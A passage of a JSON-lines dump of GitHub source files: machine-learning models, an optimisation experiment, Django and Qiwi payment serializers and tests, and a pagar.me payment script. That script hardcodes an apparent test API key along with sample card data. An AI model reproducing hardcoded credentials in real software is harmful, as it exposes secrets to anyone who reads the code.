download_rows(api_key):\n \"\"\"Downloads raw data from the Haiku spreadsheet\"\"\"\n service = build('sheets', 'v4', developerKey=api_key)\n sheet = service.spreadsheets()\n result = sheet.values().get(spreadsheetId=SPREADSHEET_ID,\n range=RANGE_NAME).execute()\n rows = result.get('values', [])\n return rows\n\ndef process_rows(rows):\n \"\"\"Processes an array of table rows\"\"\"\n ctr_fail = 0\n result = []\n for row in rows:\n haiku = process_row(row)\n if haiku:\n result.append(haiku)\n else:\n ctr_fail += 1\n print('Done processing rows. ' + str(len(result)) + ' rows ok, ' + str(ctr_fail) + ' rows ignored.')\n return result\n\ndef process_row(row):\n \"\"\"Given a raw table row, return a Haiku object, or False if the row is invalid\"\"\"\n pprint(row)\n if len(row) < 4:\n return False\n\n date = datetime.datetime.strptime(row[0], '%m/%d/%Y %H:%M:%S')\n author = row[1]\n text = list(filter(None, row[2].split('\\n')))\n topics = [topic.strip() for topic in row[3].split(';')] if row[3] else []\n \n return Haiku(date, author, text, topics)\n","repo_name":"chrispyduck/haiku","sub_path":"fetcher/downloader.py","file_name":"downloader.py","file_ext":"py","file_size_in_byte":1439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"8156523224","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\nfrom math import sqrt\n# from transformers import BertModel\nimport math, copy\nfrom bert_serving.client import BertClient\nfrom sklearn.metrics.pairwise import cosine_similarity\nbc = BertClient(check_length=False)\n\ntorch.backends.cuda.matmul.allow_tf32 = False\ntorch.backends.cudnn.benchmark = True\ntorch.backends.cudnn.deterministic = False\ntorch.cuda.empty_cache()\n\ntorch.cuda.set_per_process_memory_fraction(0.8)\ntorch.backends.cudnn.enabled = True\n\ntorch.backends.cuda.max_memory_split_size = 1024 * 8\n\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n\ndef pad_sequences(seq, min_len):\n padded_seq = torch.zeros((len(seq), min_len), dtype=torch.long)\n for i, s in enumerate(seq):\n end = min(len(s), min_len)\n padded_seq[i, :end] = torch.tensor(s[:end])\n return padded_seq\n\n# class AttentionLayer(nn.Module):\n# def __init__(self, input_dim):\n# super(AttentionLayer, self).__init__()\n# self.W = nn.Linear(input_dim, 1)\n# self.b = nn.Parameter(torch.Tensor(1))\n\n# def forward(self, inputs):\n# outputs = []\n# for sample in inputs:\n# u = self.W(sample) + self.b\n# a = F.softmax(u, dim=0)\n# weighted_input = sample * a\n# weighted_input = weighted_input.unsqueeze(0) # 添加维度\n# outputs.append(weighted_input) # 将 weighted_input 添加到 outputs\n# outputs = torch.cat(outputs, dim=0) # 沿着第0维度拼接\n# return outputs \n\ndef attention(query, key, value, mask=None, dropout=None):\n \"Compute 'Scaled Dot Product Attention'\"\n d_k = query.size(-1)\n scores = torch.matmul(query, key.transpose(-2, -1)) \\\n / math.sqrt(d_k)\n if mask is not None:\n scores = scores.masked_fill(mask == 0, -1e9)\n p_attn = F.softmax(scores, dim = -1)\n if dropout is not None:\n p_attn = dropout(p_attn)\n return torch.matmul(p_attn, value), p_attn\n\ndef clones(module, N):\n \"Produce N identical layers.\"\n return nn.ModuleList([copy.deepcopy(module) for _ in range(N)])\n\nclass MultiHeadedAttention(nn.Module):\n def __init__(self, h, d_model, dropout=0.1):\n \"Take in model size and number of heads.\"\n super(MultiHeadedAttention, self).__init__()\n assert d_model % h == 0\n # We assume d_v always equals d_k\n self.d_k = d_model // h\n self.h = h\n self.linears = clones(nn.Linear(d_model, d_model), 4)\n self.attn = None\n self.dropout = nn.Dropout(p=dropout)\n \n def forward(self, query, key, value, mask=None):\n \"Implements Figure 2\"\n if mask is not None:\n # Same mask applied to all h heads.\n mask = mask.unsqueeze(1)\n nbatches = query.size(0)\n \n # 1) Do all the linear projections in batch from d_model => h x d_k \n query, key, value = \\\n [l(x).view(nbatches, -1, self.h, self.d_k).transpose(1, 2)\n for l, x in zip(self.linears, (query, key, value))]\n \n # 2) Apply attention on all the projected vectors in batch. \n x, self.attn = attention(query, key, value, mask=mask, \n dropout=self.dropout)\n \n # 3) \"Concat\" using x view and apply x final linear. \n x = x.transpose(1, 2).contiguous() \\\n .view(nbatches, -1, self.h * self.d_k)\n return self.linears[-1](x)\n\nclass CNN_Text(nn.Module):\n \n def __init__(self, args):\n super(CNN_Text, self).__init__()\n self.args = args\n \n V = args.embed_num\n D = args.embed_dim\n C = args.class_num\n Ci = 1\n Co = args.kernel_num\n Ks = args.kernel_sizes\n\n self.embed = nn.Embedding(V, D)\n self.embed.weight.data.copy_(args.pretrained_weight)\n # self.convs1 = [nn.Conv2d(Ci, Co, (K, D)) for K in Ks]\n self.convs1 = nn.ModuleList([nn.Conv2d(Ci, Co, (K, D)) for K in Ks])\n self.relu2 = nn.LeakyReLU(negative_slope=0.01)\n self.dropout = nn.Dropout(args.dropout, self.training) \n self.fc2 = nn.Linear(128, 64).to(device)\n self.fc3 = nn.Linear(64, 1).to(device)\n # self.mattn = MultiHeadedAttention(h=8, d_model=D, dropout=0.1)\n\n\n\n # def conv_and_pool(self, x, conv):\n # x = F.relu(conv(x)).squeeze(3) # (N, Co, W)\n # x = F.max_pool1d(x, x.size(2)).squeeze(2)\n # return x\n\n \n # def Cosine_simlarity(self, vec1, vec2):\n # up = 0.0 \n # down = 0.0\n # down_1 = 0.0\n # down_2 = 0.0\n # for i in range(len(vec1)):\n # up += (vec1[i] * vec2[i])\n # for i in range(len(vec1)):\n # down_1 += (vec1[i] * vec1[i])\n # down_2 += (vec2[i] * vec2[i])\n # down = sqrt(down_1) * sqrt(down_2)\n # return float(up/down)\n\n def forward(self, q1, q2):\n\n max_len = max(self.args.kernel_sizes) + 1\n min_len = max_len if max_len % 2 == 0 else max_len + 1\n q1 = pad_sequences(q1, min_len)\n q2 = pad_sequences(q2, min_len)\n \n \n q1 = q1.to(device)\n q2 = q2.to(device)\n\n \n # 添加Transformer\n\n\n q1 = self.embed(q1) # (seq_len, batch_size, D)\n q2 = self.embed(q2)\n \n # q1=self.mattn(q1,q1,q1)\n # q2=self.mattn(q2,q2,q2)\n\n # print(q1.data.shape)\n \n # q1=bc.encode([q1])\n # q2=bc.encode([q2])\n \n if self.args.static:\n q1 = Variable(q1)\n q1 = q1.unsqueeze(1) # (N, Ci, W, D)\n \n # step1\n q1 = [self.relu2(conv(q1)).squeeze(3) for conv in self.convs1] # [(N, Co, W), ...]*len(Ks)\n # step2\n q1 = [i.size(2) * F.max_pool1d(i, i.size(2)).squeeze(2) for i in q1] # [(N, Co), ...]*len(Ks)\n q1 = [self.relu2(i) for i in q1]\n q1 = torch.cat(q1, 1) # 64 * 300\n \n q1 = self.dropout(q1) # (N, len(Ks)*Co)\n \n\n \n \n\n # q2.data = q2.data.weight.data.copy_(torch.from_numpy(pretrained_weight))\n if self.args.static:\n q2 = Variable(q2)\n q2 = q2.unsqueeze(1) # (N, Ci, W, D)\n \n q2 = [self.relu2(conv(q2)).squeeze(3) for conv in self.convs1] # [(N, Co, W), ...]*len(Ks)\n q2 = [i.size(2) * F.max_pool1d(i, i.size(2)).squeeze(2) for i in q2] # [(N, Co), ...]*len(Ks)\n q2 = [self.relu2(i) for i in q2]\n q2 = torch.cat(q2, 1)\n q2 = self.dropout(q2) # (N, len(Ks)*Co)\n\n \n \n x = torch.cat((q1, q2), dim=1)\n \n x=x.to(device)\n concatenated_dim = q1.size(1) + q2.size(1)\n self.fc1 = nn.Linear(concatenated_dim, 128).to(device)\n \n x = self.fc1(x)\n x = self.fc2(x)\n x = self.fc3(x)\n \n return torch.sigmoid(x)\n\n\n \n \n\t# #step3\n # cos_ans = F.cosine_similarity(q1, q2)\n # cos_ans=torch.sigmoid(cos_ans)\n # # cos_ans = nn.functional.pairwise_distance(q1, q2, p=2, eps=1e-06)\n # # cos_ans = F.relu(cos_ans)\n # # print(cos_ans.data)\n # return cos_ans\n \n\n\n\n","repo_name":"CarpVexing/CorNER","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":7347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"35255553802","text":"import tensorflow as tf\nimport numpy as np\nimport csv\nimport model\nimport datetime\n\n\ndef load_data(path):\n \"\"\"\n Load input data from csv files\n :param path: the path of the file\n :return: the list of data\n \"\"\"\n csvfile = open(path, 'r')\n csvreader = csv.reader(csvfile, dialect='excel')\n data = []\n for row in csvreader:\n data.append(list(row))\n csvfile.close()\n return data\n\n\ndef clean_data(data):\n \"\"\"\n Clean raw data into train data\n :param data: raw data\n :return: clean data of Ndarray\n \"\"\"\n train_data = []\n for row in data:\n train_data.append(row.strip('[]').split(','))\n return np.array(train_data, np.int32)\n\n\ndef train_pred(X, Y, test_X, batch_size=64, epochs=200, embedding_size=128, filter_sizes=[3, 4, 5], num_filters=128,\n dropout_keep_prob=0.5):\n \"\"\"\n Train TextCNN model and make prediction\n :param X: train data matrix [m, n]\n :param Y: labels matrix [m, classes_num]\n :param test_X: test data matrix [m, n]\n :param batch_size: batch size\n :param epochs: number of training epochs\n :param embedding_size: dimensionality of character embedding, that is the length of the word vector\n :param filter_sizes: list of filter sizes, similar to n-gram\n :param num_filters: number of filters per filter size\n :param dropout_keep_prob: dropout keep probability\n :return: prediction on test_X by trained model\n \"\"\"\n # build the model\n dicts = load_data('./data/dicts.csv')\n cnn = model.TextCNN(X.shape[1], Y.shape[1], len(dicts), embedding_size, filter_sizes, num_filters)\n\n # define training procedure\n global_step = tf.Variable(0, name='global_step', trainable=False)\n optimizer = tf.train.AdamOptimizer(1e-4) # use Adam algorithm to find global optimization\n grads_and_vars = optimizer.compute_gradients(cnn.loss)\n train_op = optimizer.apply_gradients(grads_and_vars, global_step=global_step) # a gradient update on our parameters\n\n sess = tf.Session() # Launch the graph in a session\n sess.run(tf.global_variables_initializer()) # initialize the model parameters\n\n def train_step(X_batch, Y_batch):\n \"\"\"\n A single training step\n :param X_batch: a batch of input data\n :param Y_batch: same batch of output label\n :return: null\n \"\"\"\n # feed_dict contains the data for the placeholder nodes we pass to our network\n feed_dict = {cnn.input_X: X_batch, cnn.input_Y: Y_batch, cnn.dropout_keep_prob: dropout_keep_prob}\n _, step, loss, accuracy = sess.run([train_op, global_step, cnn.loss, cnn.accuracy], feed_dict)\n\n # output process\n time_str = datetime.datetime.now().isoformat()\n if (step % 1000 == 0):\n print('{}: step {}, loss {:g}, acc {:g}'.format(time_str, step, loss, accuracy))\n\n def batch_iter(input_X, input_Y, batch_size):\n \"\"\"\n Generate batches\n :param input_X:\n :param input_Y:\n :param batch_size: batch size\n :return: list of batches\n \"\"\"\n m = input_X.shape[0]\n blocks = m // batch_size # the number of W changes\n batches = []\n for i in range(blocks):\n begin = i * batch_size\n end = (i + 1) * batch_size\n batches.append((input_X[begin: end], input_Y[begin: end]))\n if m % batch_size != 0:\n batches.append((input_X[blocks * batch_size:], input_Y[blocks * batch_size:]))\n return batches\n\n batches = batch_iter(X, Y, batch_size)\n # training loop\n for k in range(epochs):\n for batch in batches:\n X_batch, Y_batch = batch\n train_step(X_batch, Y_batch)\n cur_step = tf.train.global_step(sess, global_step)\n\n def make_prediction(X_batch, Y_batch):\n \"\"\"\n A prediction step\n :param X_batch: a batch of input test data\n :param Y_batch: [0]*classes_num\n :return: predictions\n \"\"\"\n # use feed_dict to feed data\n feed_dict = {cnn.input_X: X_batch, cnn.input_Y: Y_batch, cnn.dropout_keep_prob: 1.0}\n predictions = sess.run(cnn.predictions, feed_dict)\n return predictions\n\n test_Y = []\n for test_case in test_X:\n test_Y.append(make_prediction([test_case], [[0, 0, 0, 0, 0]])[0])\n\n sess.close()\n return test_Y\n\n\ndef save_data(path, data):\n \"\"\"\n Save data to a csv file\n :param path: the path of the file\n :param data: prediction data\n :return: null\n \"\"\"\n csvfile = open(path, 'w', newline='')\n csvwriter = csv.writer(csvfile, dialect='excel')\n for result in data:\n csvwriter.writerow(result)\n csvfile.close()\n\n\nif __name__ == '__main__':\n # load data\n train_raw = load_data('./data/train_in.csv')\n test_raw = load_data('./data/test_in.csv')\n\n # limit the data size, in case of running out of the memory\n train_size = 10000\n test_size = 5000\n\n # convert raw data to training data (Ndarray)\n train_X, train_Y = zip(*train_raw) # unzip the train data into input data and label\n train_X, train_Y = clean_data(train_X[:train_size]), clean_data(train_Y[:train_size])\n test_X = np.array(test_raw[:test_size], np.int32)\n print(train_X.shape, train_Y.shape, test_X.shape)\n\n test_Y = train_pred(train_X, train_Y, test_X)\n\n # save the prediction result to csv file\n output = [['PhraseId', 'Sentiment']]\n for i in range(1, test_size):\n output.append([test_raw[i][0], test_Y[i - 1]]) # Phrase in test_raw + prediction sentiment\n save_data('result.csv', output)\n","repo_name":"JuliaSun623/nlp-beginner-solution","sub_path":"Task2/tf-CNN/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5579,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"79"} +{"seq_id":"26870479317","text":"import numpy as np\nimport pypoman\nfrom pypoman.projection import project_point_to_polytope\nimport matplotlib.pyplot as plt\nfrom numpy import arange, array, cos, pi, sin\nimport pylab\n\n# vertices\nvertices = np.array([(1., 3.), (2., 1.),\n (2., 5.), (4., 6.),\n (6., 5.), (6., 3.),\n (5., 1.5)])\n\n# generate A matrix and b vector\nA, bv = pypoman.compute_polytope_halfspaces(vertices)\nineq = (A, bv)\n# mean cost\nC = np.array([4, 6])\n\n# minimum x\nvCost = vertices.dot(C)\nminX = vertices[np.argmin(vCost)]\n\n# step size parameter\na = 0.5\nb = 1\ngamma = 1\n\n# number of iterations\nT = 1000\n# batch size for costs\nB = 5\n# number of realisations\nR = 1000\n\nerr = np.zeros((R, T))\nfor j in range(R):\n # starting point\n x = np.random.normal([3, 3], [1, 1], size=2)\n for i in range(T):\n alphat = a/((b+i)**gamma)\n ct = np.transpose(np.random.normal([C[0], C[1]], [5, 5], size=(B, 2)))\n ct = np.sum(ct, axis=1)/B\n\n x -= alphat * ct\n\n # plot the polytope and projections\n\n # pylab.ion()\n # pylab.figure(figsize=(7, 7))\n # pylab.gca().set_aspect(\"equal\")\n # pypoman.plot_polygon(vertices,color='grey')\n # pylab.plot([x[0]], [x[1]], marker='x', markersize=6, color='k')\n # point = x\n x = project_point_to_polytope(x, ineq)\n\n # pylab.plot([x[0]], [x[1]], marker='o', markersize=5, color='k')\n # pylab.plot([point[0], x[0]], [point[1], x[1]], 'k--')\n # pylab.xlim([0, 8])\n # pylab.ylim([0, 8])\n # pylab.xticks(list(range(9)))\n # pylab.yticks(list(range(9)))\n # pylab.tick_params(axis='both', labelsize=15)\n # pylab.xlabel(\"$x_1$\", fontsize=20)\n # pylab.ylabel(\"$x_2$\", fontsize=20)\n # # pylab.savefig('./Figures/LPPolytope.pdf', format='pdf')\n # pylab.show()\n\n err[j][i] = np.abs(np.dot(C, x)-np.dot(C, minX))\n\nerrL1 = np.sum(err, axis=0)/R\n\n# --------------------------------------------------------------------------------------- #\nidx = np.nonzero(errL1)\nrangeT = np.array([i for i in range(1, T+1)])\n# fit the rate\nprint(np.polyfit(np.log(rangeT[idx]), np.log(errL1[idx]), 1)[0])\n# plot and save the figure\nfig, ax = plt.subplots(figsize=(8, 6))\nfig.tight_layout(pad=6)\nax.loglog(rangeT, errL1, 'k', linewidth=3)\nax.plot([1, 1e3], [5e-2, 5e-5], 'k--')\nax.legend([\"PSGD\", \"$\\mathcal{O}(t^{-1})$\"], fontsize=20)\nax.grid()\nax.set_xlabel('t', fontsize=20)\nax.set_ylabel(r'$\\mathbb{E}[|c^Tx_t - c^Tx^*|]$', fontsize=20)\nax.tick_params(axis='both', labelsize=15)\nplt.savefig('./Figures/LinearProgramsPSGDB{}.pdf'.format(B), format='pdf')\nplt.show()\n\n\n\n\n\n\n\n","repo_name":"Shangda-Yang/PSGD","sub_path":"LinearProgram.py","file_name":"LinearProgram.py","file_ext":"py","file_size_in_byte":2666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"21225767175","text":"import pagarme\r\n\r\npagarme.authentication_key('ak_test_wWCz5DhB73yJyoO5sYkMre2wEjFKib')\r\n\r\nparams = {\r\n\t\t\"amount\": \"21000\",\r\n \"card_number\": \"4111111111111111\",\r\n \"card_cvv\": \"123\",\r\n \"card_expiration_date\": \"0922\",\r\n \"card_holder_name\": \"Morpheus Fishburne\",\r\n \"customer\": {\r\n \"external_id\": \"#3311\",\r\n \"name\": \"Morpheus Fishburne\",\r\n \"type\": \"individual\",\r\n \"country\": \"br\",\r\n \"email\": \"mopheus@nabucodonozor.com\",\r\n \"documents\": [\r\n {\r\n \"type\": \"cpf\",\r\n \"number\": \"30621143049\"\r\n }\r\n ],\r\n \"phone_numbers\": [\"+5511999998888\", \"+5511888889999\"],\r\n \"birthday\": \"1965-01-01\"\r\n },\r\n \"billing\": {\r\n \"name\": \"Trinity Moss\",\r\n \"address\": {\r\n \"country\": \"br\",\r\n \"state\": \"sp\",\r\n \"city\": \"Cotia\",\r\n \"neighborhood\": \"Rio Cotia\",\r\n \"street\": \"Rua Matrix\",\r\n \"street_number\": \"9999\",\r\n \"zipcode\": \"06714360\"\r\n }\r\n },\r\n \"shipping\": {\r\n \"name\": \"Neo Reeves\",\r\n \"fee\": \"1000\",\r\n \"delivery_date\": \"2000-12-21\",\r\n \"expedited\": True,\r\n \"address\": {\r\n \"country\": \"br\",\r\n \"state\": \"sp\",\r\n \"city\": \"Cotia\",\r\n \"neighborhood\": \"Rio Cotia\",\r\n \"street\": \"Rua Matrix\",\r\n \"street_number\": \"9999\",\r\n \"zipcode\": \"06714360\"\r\n }\r\n },\r\n \"items\": [\r\n {\r\n \"id\": \"r123\",\r\n \"title\": \"Red pill\",\r\n \"unit_price\": \"10000\",\r\n \"quantity\": \"1\",\r\n \"tangible\": True\r\n },\r\n {\r\n \"id\": \"b123\",\r\n \"title\": \"Blue pill\",\r\n \"unit_price\": \"10000\",\r\n \"quantity\": \"1\",\r\n \"tangible\": True\r\n }\r\n ]\r\n}\r\n\r\ncard_data = {\r\n \"card_expiration_date\": \"1122\",\r\n \"card_number\": \"4018720572598048\",\r\n \"card_cvv\": \"123\",\r\n \"card_holder_name\": \"Cersei Lannister\"\r\n}\r\n\r\nprint (pagarme.card.create(card_data))\r\n\r\n\r\n\r\ntransfer_params = {\r\n 'amount': '10000',\r\n 'recipient_id': 'RECIPIENT_ID'\r\n}\r\n\r\ntransfer = pagarme.transfer.create(transfer_params)\r\n\r\nprint (transfer)\r\n\r\n\r\ntrx = pagarme.transaction.create(params)\r\n\r\nprint(trx)\r\n\r\ntrx = pagarme.transaction.create(params)\r\nprint(trx)\r\n\r\n\r\nbalance = pagarme.balance.default_recipient_balance()\r\nprint(balance)","repo_name":"flcavqueiroz/houp-api","sub_path":"pagarme_test.py","file_name":"pagarme_test.py","file_ext":"py","file_size_in_byte":2254,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"31620454584","text":"# 시간초과 나는 코드 -> 인덱스로 접근하기 때문에 최악의 경우 시간복잡도가 O(n^2)\n# num = int(input())\n# val = list(map(int, input().split()))\n# res = []\n#\n# while val:\n# k = val.pop()\n# a = len(val)\n# flag = 0\n# if a == 0:\n# res.append(0)\n# break\n# while k > val[a - 1]:\n# a -= 1\n# if a == 0:\n# break\n# res.append(a)\n#\n# res.reverse()\n# res = list(map(str, res))\n# print(' '.join(res))\n\nnum = int(input())\nval = list(map(int, input().split()))\nres = [0] * num\nstack = []\n#스택에 현재 탑의 인덱스들을 저장\nfor i in range(num):\n #스택이 비어있지 않고, 스택의 마지막값이 들어온 값보다 작을경우 그 스택을 제거\n while stack and val[stack[-1]] < val[i]:\n stack.pop()\n #스택이 비어있지 않고, 마지막값이 들어온값보다 클때 -> 조건 만족\n #정답의 위치에 해당 인덱스값 + 1을 저장\n if stack:\n res[i] = stack[-1] + 1\n #스택에 인덱스 저장\n stack.append(i)\n\nres = list(map(str, res))\nprint(' '.join(res))","repo_name":"seyeon22222/Self_study","sub_path":"Stack/Top(2493).py","file_name":"Top(2493).py","file_ext":"py","file_size_in_byte":1117,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"994029866","text":"from .models import SalesPerson, PotentialCustomer, AutomobileVO, SalesRecord\nfrom common.json import ModelEncoder\n\nclass SalesPersonEncoder(ModelEncoder):\n model = SalesPerson\n properties = [\n \"name\",\n \"employee_number\",\n ]\n\nclass PotentialCustomerEncoder(ModelEncoder):\n model = PotentialCustomer\n properties= [\n \"name\",\n \"address\",\n \"phone_number\",\n ]\n\nclass AutomobileVOEncoder(ModelEncoder):\n model = AutomobileVO\n properties = [\n \"vin\",\n \"sold\",\n ]\n\nclass SalesRecordEncoder(ModelEncoder):\n model = SalesRecord\n properties = [\n \"automobile\",\n \"salesperson\",\n \"customer\",\n \"price\",\n ]\n\n encoders = {\n \"automobile\": AutomobileVOEncoder(),\n \"salesperson\": SalesPersonEncoder(),\n \"customer\": PotentialCustomerEncoder(),\n }","repo_name":"eugenehong270/next-gen-motors","sub_path":"sales/api/sales_rest/encoders.py","file_name":"encoders.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"25030834213","text":"# Time complexity : O(log N)\n# Space complexity : O(1)\nclass Solution:\n def evenlyDivides(self, N):\n num = N\n count = 0\n while num > 0:\n rem = num % 10\n if rem != 0 and N % rem == 0:\n count = count + 1\n num = num // 10\n return count\n\n\nif __name__ == \"__main__\":\n t = int(input())\n for _ in range(t):\n N = int(input())\n\n ob = Solution()\n print(ob.evenlyDivides(N))\n","repo_name":"anuva312/Strivers-A2Z-DSA-Course","sub_path":"3. Basic Maths/1. Count Digits/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"42172339878","text":"import pytest\n\nfrom django_pay2.providers.qiwi.serializers import QiwiNotifySerializer\n\npytestmark = pytest.mark.django_db\n\n\nclass TestQiwiNotifySerializer:\n @pytest.fixture\n def payment(self, payment_factory, sample_uid):\n return payment_factory(amount=\"10.00\", id=sample_uid)\n\n @pytest.fixture(autouse=True)\n def set_qiwi_secret_key(self, settings):\n settings.PAYMENTS = {\"QIWI\": {\"secret_key\": \"qwerty\"}}\n\n def test_positive(self, sample_uid, payment):\n serializer = QiwiNotifySerializer(\n data={\n \"bill\": {\n \"siteId\": \"1234\",\n \"billId\": sample_uid,\n \"amount\": {\"value\": \"10.00\", \"currency\": \"RUB\"},\n \"status\": {\n \"value\": \"PAID\",\n },\n }\n },\n context={\n \"hmac\": \"4dce0933f565dde1b45bc73ccb91af755fcad313751371de9688521e5b49b9f4\"\n },\n )\n\n assert serializer.is_valid(), serializer.errors\n\n def test_if_hmac_is_invalid(self, sample_uid, payment):\n serializer = QiwiNotifySerializer(\n data={\n \"bill\": {\n \"siteId\": \"1234\",\n \"billId\": sample_uid,\n \"amount\": {\"value\": \"10.00\", \"currency\": \"RUB\"},\n \"status\": {\n \"value\": \"PAID\",\n },\n }\n },\n context={\n \"hmac\": \"aef5c05b1ee219d8ff954db86020de22867304f274d894b0b725d50d9ea138b5\"\n },\n )\n\n assert not serializer.is_valid()\n\n def test_if_amount_mismatches(self, sample_uid, payment):\n serializer = QiwiNotifySerializer(\n data={\n \"bill\": {\n \"siteId\": \"1234\",\n \"billId\": sample_uid,\n \"amount\": {\"value\": \"20.00\", \"currency\": \"RUB\"},\n \"status\": {\n \"value\": \"PAID\",\n },\n }\n },\n context={\n \"hmac\": \"7570b3fd44b5b9f991ab975b5ba58876fd937ae2b34b078ae391b7468a6f65eb\"\n },\n )\n\n assert not serializer.is_valid()\n\n def test_if_unexpected_status(self, sample_uid, payment):\n serializer = QiwiNotifySerializer(\n data={\n \"bill\": {\n \"siteId\": \"1234\",\n \"billId\": sample_uid,\n \"amount\": {\"value\": \"10.00\", \"currency\": \"RUB\"},\n \"status\": {\n \"value\": \"PENDING\",\n },\n }\n },\n context={\n \"hmac\": \"6d37eb02527ba99d9e75f2a9de338497f5e154ec0c0fee614ef10e7597dd39db\"\n },\n )\n\n assert not serializer.is_valid()\n","repo_name":"la1t/django_pay","sub_path":"tests/providers/qiwi/test_serializers.py","file_name":"test_serializers.py","file_ext":"py","file_size_in_byte":2874,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"40201035338","text":"# 打开一个不存在的文件,w:文件不存在会新建\nf = open(\"D:/python/project-learn/05_文件操作/test.txt\", \"w\", encoding=\"UTF-8\")\n# write - 写入(将内容写入到内存中)\nf.write(\"hello world!!\")\n# flush - 刷新(将内存中积攒的内容,写入到硬盘的文件中)\nf.flush()\n# close - 关闭(close方法,内置了flush的功能\nf.close()\n\n# # 打开一个存在的文件,文件原有内容会被清空\n# f = open(\"D:/python/project-learn/05_文件操作/test.txt\", \"w\", encoding=\"UTF-8\")\n# # write写入\n# f.write(\"我是小明\")\n# # close关闭\n# f.close()\n","repo_name":"Marcoming1990/python_learn","sub_path":"05_文件操作/02_文件的写入.py","file_name":"02_文件的写入.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"9256273400","text":"#!/usr/bin/env python\n# coding: utf-8\n\nfrom pathlib import Path\nimport yaml\nimport numpy as np\nfrom tqdm import tqdm\nimport torch\nfrom torch import multiprocessing\nimport sys\n\nfrom data import get_dataset\nfrom models import get_model\nfrom optimizer import get_optim\nfrom training_methods import get_train\n\n\ndef find_pars_yaml(argv = []):\n paths = []\n ret = []\n if len(argv) >= 2:\n if(argv[1] != \"glob\"):\n for x in range(1, len(argv)):\n paths.append(Path(\"../experiments/\" + argv[x]))\n else:\n for x in range(2, len(argv)):\n paths.extend(Path(\"../experiments/\").glob(argv[x]))\n else:\n paths = Path(\"../experiments/\").glob(\"*.yml\")\n for p in paths:\n yml = yaml.safe_load(p.open())\n if yml.get(\"alldone\"):\n continue\n else:\n ret.append(p)\n return ret\n\ndef num2conf(num, lens):\n left = num\n res = [0]*len(lens)\n for ix in range(len(lens)-1, -1, -1):\n res[ix] = left % lens[ix]\n left = int(left/lens[ix])\n return res\n\ndef dict2dev(d, dev):\n return {x : d[x].to(dev) for x in d}\n\ndef train1setting(settings, save_path):\n pr_nr = int(multiprocessing.current_process().name.split(\"-\")[1])\n d = {0:0, 1:1, 2:0, 3:1, 4:2}\n device = torch.device(\"cuda:\"+str(d[pr_nr%2]) if torch.cuda.is_available() else \"cpu\")\n #device = torch.device(\"cuda:3\")\n save_path.mkdir(parents=True, exist_ok=True)\n ds = get_dataset(settings, device)\n yaml.dump(settings, (save_path/\"settings.yml\").open(mode=\"w\"))\n if type(settings[\"statrep\"])==int:\n start = 0\n end = settings[\"statrep\"]\n else:\n start = int(settings[\"statrep\"].split(\"_\")[0])\n end = int(settings[\"statrep\"].split(\"_\")[1])\n\n for rep in range(start, end):\n p = save_path / (\"stats_\"+str(rep)+\".pkl\")\n if p.exists():\n continue\n #print(\"rep\", rep)\n ds.setRep(rep)\n #torch.cuda.empty_cache()\n torch.manual_seed(rep)\n model = get_model(settings, ds.num_node_features, ds.num_classes).to(device)\n opt = get_optim(model, settings)\n train = get_train(settings)\n model_path = save_path / (\"model_\"+str(rep)+\".pt\")\n stats = train(ds, model, opt, settings, save_path = model_path)\n if settings[\"save_models\"] and settings[\"early_stopping\"]==False:\n torch.save(model.state_dict(), model_path)\n stats.to_pickle(p)\n\n#glue method to use imap\ndef f(args):\n i, lens, keys, settings_dict, save_path = args\n conf = num2conf(i, lens)\n current_dict = {keys[i]:settings_dict[keys[i]][conf[i]] for i in range(len(conf))}\n train1setting(current_dict, save_path/(\"setting_\"+str(i)))\n \ndef run1exp(save_path, settings_dict, p):\n setting_ls = list(settings_dict.items())\n lens = [len(x[1]) for x in setting_ls]\n keys = [x[0] for x in setting_ls]\n n = np.prod(np.array(lens))\n it = list(zip(range(n), [lens]*n, [keys]*n, [settings_dict]*n, [save_path]*n))\n tmp = list(tqdm(p.imap(f, it), total=len(it)))\n\n\ndef main(argv):\n paths2do = find_pars_yaml(argv)\n print(\"#\"*30)\n print(\"will run \"+str(len(paths2do))+\" experiments:\")\n print(paths2do)\n print(\"#\"*30)\n multiprocessing.set_start_method(\"forkserver\")\n with multiprocessing.Pool(2) as p:\n for count, path in enumerate(paths2do):\n print((count+1), \"of\", len(paths2do), \"doing\", path)\n yml = yaml.safe_load(path.open())\n print(yml)\n print(\"#\"*30)\n save_path = Path(\"../results/\"+path.parts[-1].split(\".\")[0]+\"/\")\n run1exp(save_path, yml, p)\n yml[\"alldone\"] = True\n yaml.dump(yml, path.open(mode=\"w\"))\n\n\nif __name__ == \"__main__\":\n main(sys.argv)\n","repo_name":"Foisunt/FMMs-in-GNNs","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":3789,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"79"} +{"seq_id":"20425446544","text":"# from struct import pack\nfrom .utils import int2bytes, bytes2int\n\n\ndef decrypt(crypto, n, d):\n return int2bytes(pow(bytes2int(crypto), d, n))\n\n\ndef encrypt(message, n, e):\n i = bytes2int(message)\n assert i <= n\n return int2bytes(pow(i, e, n))\n\n\ndef vencrypt(n, e, src, out):\n from random import SystemRandom\n from .varint import encode, encode_stream\n\n # from sys import stderr\n\n random = SystemRandom()\n 